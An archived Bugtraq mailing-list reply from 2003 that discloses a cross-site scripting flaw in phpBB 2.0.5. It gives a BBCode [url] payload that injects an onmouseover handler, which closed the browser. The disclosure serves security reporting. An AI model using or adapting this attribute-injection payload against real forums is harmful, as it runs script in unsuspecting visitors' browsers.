Re: XSS vulnerability in phpBB (an other ;-)

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: XSS vulnerability in phpBB (an other ;-)
From: "Everett Feldt" <efeldt@xxxxxxx>
Date: Tue, 9 Sep 2003 20:02:42 -0400
Importance: Normal
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Using [url=http://www.google.com "onmouseover="window.close();"]Funny
website[/url]

I was able to get the browser to close. This was done on phpBB 2.0.5

Prev by Date: Re: BAD NEWS: Microsoft Security Bulletin MS03-032 another temporary solution
Next by Date: Permitting recursion can allow spammers to steal name server resources
Previous by thread: Re: XSS vulnerability in phpBB (an other ;-)
Next by thread: Escapade Scripting Engine XSS Vulnerability and Path Disclosure
Index(es):
- Date
- Thread